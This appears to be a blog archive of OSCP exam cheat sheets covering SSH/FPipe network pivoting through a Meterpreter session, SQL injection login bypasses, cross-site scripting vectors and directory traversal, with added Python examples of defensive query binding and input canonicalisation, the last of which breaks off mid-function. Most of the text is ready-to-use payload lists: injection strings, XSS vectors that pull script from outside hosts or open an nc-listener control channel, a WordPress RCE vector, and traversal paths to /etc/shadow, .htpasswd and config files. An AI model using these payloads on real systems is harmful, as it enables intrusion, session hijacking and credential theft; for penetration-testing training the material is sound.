Monthly Archives: March 2017

Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide – Network Pivoting – PART 7

 

Network Pivoting using SSH tunneling and forwarding:

 

Is Microsoft Network Monitor installed? If so, depending on the version, you may have to run netmon, netcap, or nmcap, each of which has slightly different features and syntax. For example, if Network Monitor 3 is installed, you could run the following command at a shell prompt:

C:\> NMCap /network 1 /capture /file c:\windows\temp\capt.cap /timeafter 10 minutes

… which starts a capture on network 1, writing to the specified file for ten minutes.

 

Setup used for this tutorial:

Attacker IP: 192.168.1.100

Victim IP: 192.168.1.200, second NIC 172.16.1.73 (connected to the 172.16.1.0/24 network; a Windows XP Pro workstation)

Corporate server IP: 172.16.1.80

I will use a VMware-based lab; all addresses used in this tutorial are internal addresses only.

1. Once we have received our Meterpreter session on the attacking machine, we first upload our tools, PLINK and FPipe.

meterpreter > upload plink.exe c:\\
[*] uploading  : plink.exe -> c:\
[*] uploaded   : plink.exe -> c:\\plink.exe
meterpreter > upload FPipe.exe c:\\
[*] uploading  : FPipe.exe -> c:\
[*] uploaded   : FPipe.exe -> c:\\FPipe.exe

2. Open a command prompt:

meterpreter > execute -i -H -f cmd.exe
Process 1844 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>

3. Create an SSH tunnel back to our attacking machine using PLINK

C:\>plink -P 22 -l root -pw qwe123 -C -R 3389:127.0.0.1:1234 192.168.1.100
Last login: Fri Jul 17 19:49:35 2009 from 212.235.66.178
Linux 2.6.21.5.
 exploit ~ #
plink -P "ssh server port" -l "ssh server user name" -pw "ssh server password" -C -R "local port":127.0.0.1:"remote port" "ssh server ip address"

4. Send the command prompt to the background by pressing CTRL+Z.

Background channel 3? [y/N]  y
[-] core_channel_interact: Operation failed: 1168
meterpreter >

* The command prompt is still running in the background and remains active on the victim machine; you can resume it by typing the “interact” command followed by the channel number:

meterpreter > interact 3
Interacting with channel 3...
 exploit ~ #

5. Open a new command prompt channel

meterpreter > execute -i -H -f cmd.exe
Process 3472 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>

6. Forward traffic to the server using FPipe

C:\>Fpipe.exe -l 1234 -s 1234 -r 3389 172.16.1.80

(You can add the -v switch for verbose output; you can also background this channel and continue working in Meterpreter.)

Let’s take a look at some of the FPipe options used here:

-l    – listening port number
-r    – remote port number
-s    – outbound source port number

If the Windows firewall blocks this, use the following command to allow it:

c:\>netsh firewall add portopening TCP 1234 "Name of the exception" enable all

 

7. RDP to the server machine
Before we do that, let's verify that our attacking machine is listening on port 3389.

exploit ~ # netstat -antp | grep 3389
netstat -antp | grep 3389
tcp        0      0 127.0.0.1:3389          0.0.0.0:*               LISTEN     3494/4
 exploit ~ # rdesktop 127.0.0.1

If everything went well, a remote desktop session should open.
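An added example (not from the tutorial or from the tool authors) that models the two hops configured above and traces where a connection to the attacker's port 3389 ends up. The point it makes explicit is that the 127.0.0.1 in the -R specification is resolved on the victim (the SSH client), not on the attacking machine where the listener opens. Hop, parse_plink_remote_forward, parse_fpipe and trace are names chosen here; the password is replaced by a placeholder.

```python
from dataclasses import dataclass
from typing import List, Tuple

LOOPBACK = {"127.0.0.1", "localhost"}


@dataclass(frozen=True)
class Hop:
    listener_host: str   # host on which the listening socket lives
    listen_port: int
    target_host: str     # where the hop sends traffic, as written in its config
    target_port: int
    resolver_host: str   # host whose network view decides what target_host means
    tool: str


def parse_plink_remote_forward(cmdline: str, ssh_client: str, ssh_server: str) -> Hop:
    """plink ... -R [bind:]port:host:hostport server

    The listener opens on the SSH *server* (loopback-only unless GatewayPorts is
    set, which is why netstat above shows 127.0.0.1:3389). host:hostport is
    connected to by the SSH *client*, i.e. the victim running plink, so
    127.0.0.1 here means the victim, not the attacker.
    """
    toks = cmdline.split()
    spec = toks[toks.index("-R") + 1].split(":")
    port, host, hostport = spec[-3], spec[-2], spec[-1]   # ignore optional bind address
    return Hop(ssh_server, int(port), host, int(hostport), ssh_client, "ssh -R")


def parse_fpipe(cmdline: str, victim: str) -> Hop:
    """FPipe -l listen [-s srcport] -r remoteport remotehost: a relay on the victim,
    so its target is resolved on the victim as well."""
    toks = cmdline.split()
    listen = int(toks[toks.index("-l") + 1])
    remote_port = int(toks[toks.index("-r") + 1])
    return Hop(victim, listen, toks[-1], remote_port, victim, "FPipe")


def trace(entry_host: str, entry_port: int, hops: List[Hop]) -> List[Tuple[str, int]]:
    """Follow a connection to entry_host:entry_port through the configured hops."""
    path = [(entry_host, entry_port)]
    seen = set()
    while (entry_host, entry_port) not in seen:       # guard against forwarding loops
        seen.add((entry_host, entry_port))
        hop = next((h for h in hops if h.listener_host == entry_host
                    and h.listen_port == entry_port), None)
        if hop is None:
            break                                    # no listener here: a real service
        entry_host = hop.resolver_host if hop.target_host in LOOPBACK else hop.target_host
        entry_port = hop.target_port
        path.append((entry_host, entry_port))
    return path


# Addresses and command lines as in the tutorial above (password elided).
ATTACKER, VICTIM, SERVER = "192.168.1.100", "192.168.1.200", "172.16.1.80"
HOPS = [
    parse_plink_remote_forward(
        "plink -P 22 -l root -pw <password> -C -R 3389:127.0.0.1:1234 192.168.1.100",
        ssh_client=VICTIM, ssh_server=ATTACKER),
    parse_fpipe("Fpipe.exe -l 1234 -s 1234 -r 3389 172.16.1.80", victim=VICTIM),
]

if __name__ == "__main__":
    # "rdesktop 127.0.0.1" on the attacker enters the chain at ATTACKER:3389
    for host, port in trace(ATTACKER, 3389, HOPS):
        print(f"{host}:{port}")
```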

 

Tools used in this tutorial:

PLINK

Plink is a command-line interface to the PuTTY back ends (the Telnet and SSH client itself).

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

FPipe

FPipe is a source port forwarder/redirector created by Foundstone. It can create a TCP or UDP stream with a source port of your choice. This is useful for getting past firewalls that allow traffic with a source port of, say, 23 to connect to internal servers.

http://www.foundstone.com/us/resources/proddesc/fpipe.htm

The Metasploit Framework

http://www.metasploit.com/framework/download/

Other Related Tools

Data Pipe
This is a simple TCP/IP socket redirection application that offers a little more complexity than the simple fork-based datapipes that are commonly available. This source has been successfully compiled and used on Linux, FreeBSD, and Win32. I have released it into the public domain.

http://jeff.bovine.net/Datapipe

WinRelay
WinRelay is a TCP/UDP forwarder/redirector that works with both IPv4 and IPv6. You can choose the port and IP it will listen on, the source port and IP that it will connect from, and the port and IP that it will connect to.
http://ntsecurity.nu/toolbox/winrelay/

Socat
Multipurpose relay.
http://www.dest-unreach.org/socat/


Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- SQLi XSS Web App Attacks – PART 5

 

SQL Injection Commands

 

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

A query like this is commonly used by a web application to authenticate a user. If the query returns a row, a user with that set of credentials exists in the database and the user is allowed to log in; otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

Assuming the parameter values are sent to the server with the GET method, and the domain of the vulnerable web site is www.example.com, the request we carry out will be:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1

The query returns a row (or a set of rows) because the condition is always true: AND binds tighter than OR, so the OR '1' = '1' clause makes the WHERE condition true for every row. In this way the system has authenticated the user without knowing a valid username or password.
In some systems the first row of the user table is an administrator account, and that may be the profile returned. Another example of a query is the following:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password'))) 

$username = 1' or '1' = '1'))/*
$password = foo

In this way, we get the following query:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('foo')))

(Because the $username value includes a comment delimiter, the password portion of the query is ignored.)
The URL request will be:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo 

SELECT * FROM products WHERE id_product=$id_product

Consider also a request to a script that executes the query above:

http://www.example.com/product.php?id=10

When the tester tries a valid value (e.g. 10 in this case), the application will return the description of a product. A good way to test whether the application is vulnerable in this scenario is to play with the logic, using the operators AND and OR.
Consider the request:

http://www.example.com/product.php?id=10 AND 1=2
SELECT * FROM products WHERE id_product=10 AND 1=2

In this case the application will probably return a message saying there is no content available, or a blank page. The tester can then send a true statement and check whether a valid result is returned:

http://www.example.com/product.php?id=10 AND 1=1

Consider the following SQL query:

SELECT * FROM products WHERE id_product=$id_product

A way to exploit the above scenario would be:

http://www.example.com/product.php?id=10; INSERT INTO users (…)
'
or 1=1
or 1=1--
or 1=1#
or 1=1*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'*
admin' or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'*
1234' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"*
admin" or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"*
1234" AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
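As an added example (not from the page), the login and product queries explained above are built with string concatenation beside parameterised versions and run against a constructed in-memory SQLite database. The tautology, comment-delimiter and AND 1=2 inputs from the text are used as the test inputs; table and column names follow the page except for the added PasswordHash column, and the MD5 function is registered because SQLite has none.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed sample data for the demonstration (not from the page)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no MD5(); register one so the page's MD5 query form runs unchanged.
    conn.create_function("MD5", 1, lambda s: hashlib.md5(s.encode()).hexdigest())
    conn.executescript("""
        CREATE TABLE Users(Username TEXT, Password TEXT, PasswordHash TEXT);
        INSERT INTO Users VALUES ('admin', 'S3cret!', MD5('S3cret!'));
        INSERT INTO Users VALUES ('alice', 'hunter2', MD5('hunter2'));
        CREATE TABLE products(id_product INTEGER, name TEXT);
        INSERT INTO products VALUES (10, 'widget');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """The first query on the page: user input spliced into the SQL text."""
    sql = f"SELECT * FROM Users WHERE Username='{username}' AND Password='{password}'"
    return conn.execute(sql).fetchall()


def login_vulnerable_md5(conn, username, password):
    """The second query on the page (MD5 form), same splicing defect: a
    username ending in '))/* comments out the whole password check."""
    sql = (f"SELECT * FROM Users WHERE ((Username='{username}') "
           f"AND (PasswordHash=MD5('{password}')))")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterised form: the driver passes the values separately from the SQL
    text, so quotes, OR clauses and comment delimiters are compared as data."""
    sql = "SELECT * FROM Users WHERE Username=? AND PasswordHash=MD5(?)"
    return conn.execute(sql, (username, password)).fetchall()


def product_vulnerable(conn, id_product):
    """Numeric context: no quote to break out of, '10 AND 1=2' simply extends
    the WHERE clause, which is what the boolean probe above relies on."""
    sql = f"SELECT * FROM products WHERE id_product={id_product}"
    return conn.execute(sql).fetchall()


def product_safe(conn, id_product):
    """Validate the type first, then bind. Returns None for a malformed id."""
    if not str(id_product).isdigit():
        return None
    return conn.execute("SELECT * FROM products WHERE id_product=?",
                        (int(id_product),)).fetchall()
```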



Cross Site Scripting Commands:

Technique: Vector/Payload
(* In URLs: & => %26, # => %23, + => %2B)

HTML Context, Tag Injection
<svg onload=alert(1)>
"><svg onload=alert(1)//

HTML Context, Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//

Javascript Context, Code Injection
'-alert(1)-'
'-alert(1)//

Javascript Context, Code Injection (escaping the escape)
\'-alert(1)//

Javascript Context, Tag Injection
</script><svg onload=alert(1)>

PHP_SELF Injection
http://DOMAIN/PAGE.php/"><svg onload=alert(1)>

Without Parenthesis
<svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>

Filter Bypass, Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)

Body Tag
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)

Miscellaneous Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!

Agnostic Event Handlers
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!

Code Reuse, Inline Script
<script>alert(1)//
<script>alert(1)<!--

Code Reuse, Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>

Filter Bypass, Generic Tag + Handler
Encoding:
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
Mixed Case:
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
Doubling:
<x onxxx=1 onxxx=1
Spacers:
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes:
<x 1='1'onxxx=1
<x 1="1"onxxx=1
Stripping:
<[S]x onx[S]xx=1
([S] = stripped char or string)
Mimetism:
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/

Generic Source Breaking
<x onxxx=alert(1) 1='

Browser Control
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done

Multi Reflection, Double Reflection
Single Input:
'onload=alert(1)><svg/1='
Single Input (script-based):
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*

Multi Reflection, Triple Reflection
Single Input:
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
Single Input (script-based):
*/</script>'>alert(1)/*<script/1='

Multi Reflection, Multi Input
Double Input:
p=<svg/1='&q='onload=alert(1)>
Triple Input:
p=<svg 1='&q='onload='/*&r=*/alert(1)'>

Without Event Handlers
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

Mobile Only, Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>

Mobile Only, Javascript Properties
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>

Mobile Only, Javascript Functions
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>

Generic Self to Regular XSS
<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>

File Upload, Injection in Filename
"><img src=1 onerror=alert(1)>.gif

File Upload, Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg

File Upload, Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

File Upload, Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

Google Chrome Auditor Bypass (up to v51)
<script src="data:&comma;alert(1)//
"><script src=data:&comma;alert(1)//
<script src="//brutelogic.com.br&sol;1.js&num;
"><script src=//brutelogic.com.br&sol;1.js&num;
<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;

PHP File for XHR Remote Call
<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 onerror=alert(1)>

Server Log Avoidance
<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1))>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>

Shortest PoC
<base href=//0>
$ while :; do echo "alert(1)" | nc -lp80; done

Portable WordPress RCE
<script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num;
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

fromCharCode

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Default SRC tag to get past filters that check SRC domain

This will bypass most SRC domain filters. Inserting JavaScript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted, like onblur or onclick, giving you an extensive number of variations for many of the injections listed here. Submitted by David Cross.

Edited by Abdullah Hussam(@Abdulahhusam).

<IMG SRC=# onmouseover="alert('xxs')">

Default SRC tag by leaving it empty

<IMG SRC= onmouseover="alert('xxs')">

Default SRC tag by leaving it out entirely

<IMG onmouseover="alert('xxs')">

On error alert

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

IMG onerror and javascript alert encode

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Decimal HTML character references

(All of the XSS examples that use a javascript: directive inside an <IMG tag will not work in Firefox or Netscape 8.1+ in Gecko rendering engine mode.)

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Decimal HTML character references without trailing semicolons

This is often effective against XSS filters that look for “&#XX;”, since most people don’t know about padding: up to 7 numeric characters in total. It is also useful against people who decode with strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an HTML-encoded string (I’ve seen this in the wild):

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Hexadecimal HTML character references without trailing semicolons

This is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that a numeric character follows the pound symbol, which is not true of hex HTML character references.

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Embedded tab

Used to break up the cross site scripting attack:

<IMG SRC="jav	ascript:alert('XSS');">

Embedded Encoded tab

Use this one to break up XSS :

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Embedded newline to break up XSS

Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ASCII chart for more details. The following XSS examples illustrate this vector:

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

Embedded carriage return to break up XSS

(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I’ve seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null breaks up JavaScript directive

Null chars also work as XSS vectors, but not like above: you need to inject them directly using something like Burp Proxy, or use %00 in the URL string, or, if you want to write your own injection tool, you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again: older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char, 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
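The filter defects discussed above (a semicolon assumed after every numeric reference, decimal assumed after "&#", and tab/newline/CR/NUL tolerated inside a URL scheme) all come from validating before canonicalising. This added example (not from the original cheat sheet) decodes numeric character references the way a browser does, strips the control characters the text lists, and then allow-lists the scheme of an <img src> value; the function names are chosen here, and the weak decoder beside it shows what the criticised regex approach misses.

```python
import re

# Numeric character references: "&#" then decimal digits, or x plus hex digits,
# with the terminating semicolon OPTIONAL. Browsers accept the unterminated and
# zero-padded forms shown above, so a filter that insists on ";" or on decimal
# digits can be walked around. (html.unescape in the stdlib applies the same rule.)
_NUMERIC_REF = re.compile(r"&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?")


def decode_numeric_refs(value: str) -> str:
    """Decode &#NNN; / &#NNN / &#xHH; / &#xHH as an HTML parser would."""
    def repl(m):
        cp = int(m.group(1), 16) if m.group(1) else int(m.group(2), 10)
        if cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
            return "\ufffd"          # invalid code point: browsers substitute U+FFFD
        return chr(cp)
    return _NUMERIC_REF.sub(repl, value)


def normalize_url_attr(value: str) -> str:
    """Canonicalise an attribute value before deciding anything about it."""
    text = decode_numeric_refs(value)
    # Tab, LF and CR are ignored inside a scheme ("jav<TAB>ascript:"); NUL and the
    # soft hyphen (U+00AD) were tolerated by old engines. Drop them, together with
    # spaces and every other C0 control, so the scheme check sees what the
    # browser will execute. This string is only used for the check, not for output.
    return "".join(ch for ch in text
                   if ord(ch) > 0x20 and ord(ch) != 0x7F and ch != "\u00ad")


_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_src(value: str) -> bool:
    """Allow-list check for an <img src> value: relative URLs, http and https only."""
    m = _SCHEME.match(normalize_url_attr(value))
    if m is None:
        return True                  # relative URL or fragment: no scheme to abuse
    return m.group(1).lower() in ALLOWED_SCHEMES


def naive_filter_blocks(value: str) -> bool:
    """The weak approach criticised above: decode only '&#NNN;' forms that carry a
    semicolon, then search for the literal 'javascript:'. Returns True if blocked."""
    decoded = re.sub(r"&#(\d+);", lambda m: chr(int(m.group(1))), value)
    return "javascript:" in decoded.lower()
```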



DIRECTORY TRAVERSAL COMMANDS:


/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
db.php
data.php
database.asp
database.js
database.php
dbase.php
admin/access_log
../users.db.php
users.db.php
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\.....\\\.....\\\.....\\\
= "/.." . "%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/access_log
../../../../../../../etc/httpd/logs/access.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
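As an added example (not from the page), a canonicalise-then-check path resolver that neutralises the traversal forms in the list above: plain ../ sequences, URL-encoded %2F and %5c separators, overlong UTF-8 %c0%ae dots, and backslashes. Going beyond the list it also undoes double percent-encoding and refuses embedded NUL bytes. The document root /srv/files and the function names are placeholders chosen here.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Constructed document root for the demonstration; nothing on the page names one.
ROOT = "/srv/files"

# Overlong two-byte UTF-8 (lead byte C0 or C1) encodes an ASCII character that
# should have been a single byte: %c0%ae is '.', %c1%9c is '\'. Strict decoders
# reject these, but servers that accept them let "../" through as "%c0%ae%c0%ae/".
_OVERLONG_2BYTE = re.compile(rb"[\xc0\xc1]([\x80-\xbf])")


def canonicalize(raw: str) -> str:
    """Undo the encodings a traversal payload hides behind, before any path logic."""
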